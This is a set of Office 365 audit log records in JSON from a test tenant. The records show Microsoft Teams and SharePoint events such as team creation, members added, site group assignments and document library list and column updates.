+{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"} +{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:00","Id":"9b9e973b-64c3-4607-bc79-bf743c985051","Operation":"TeamCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":2,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","TeamName":"users"} +{"CreationTime":"2021-02-05T09:07:58","Id":"f16cc0cc-2a18-580e-83c5-04d3c385ebb8","Operation":"MemberAdded","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","AADGroupId":"61b6d6f5-7aa0-437b-a967-fbcd39ec90a1","CommunicationType":"Team","Members":[{"DisplayName":"Adrian Serrano","Role":2,"UPN":"admin@testsiem4.onmicrosoft.com"},{"DisplayName":"Eve","Role":2,"UPN":"eve@testsiem4.onmicrosoft.com"}],"TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","ItemName":"users","TeamName":"users"} +{"CreationTime":"2021-02-05T09:08:13","Id":"6454a7d9-afae-4a6c-ffa5-08d8c9b5911c","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-5054-2000-9ced-83aa1cf560fd","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:12","Id":"6d69552c-2019-4f7c-92bc-08d8c9b5908b","Operation":"FolderCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":6,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/Shared Documents\/General","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-b01b-2000-9ced-879789d2d8e5","EventSource":"SharePoint","ItemType":"Folder","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","ListItemUniqueId":"81d4cd08-7ffb-45d2-a422-86a9a9335d66","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","SourceFileExtension":"","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/","SourceFileName":"General","SourceRelativeUrl":"Shared Documents"} +{"CreationTime":"2021-02-05T09:07:57","Id":"6e9fc7e0-158a-4456-2a89-08d8c9b58771","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"Everyone except external users"} +{"CreationTime":"2021-02-05T09:07:56","Id":"a9b8277d-d3b9-4d99-0491-08d8c9b5874b","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:07:56","Id":"dfef0880-e895-47e1-2e39-08d8c9b58733","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} +{"CreationTime":"2021-02-05T09:07:56","Id":"d9b6f410-30c7-42a0-0820-08d8c9b5872c","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Members"} +{"CreationTime":"2021-02-05T09:07:56","Id":"5c82c14e-525e-44f4-7cd7-08d8c9b58722","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"20.190.143.50","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"O365AdminCenter<\/SiteCreationSource>True<\/TenantSettings.ShowCreateSiteCommand>False<\/TenantSettings.UseCustomSiteCreationForm>"} +{"CreationTime":"2021-02-05T09:07:56","Id":"f84f38b0-1963-4a1d-454e-08d8c9b586e9","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} +{"CreationTime":"2021-02-05T09:07:55","Id":"e85ec350-af23-47a7-5b33-08d8c9b586be","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"} +{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} 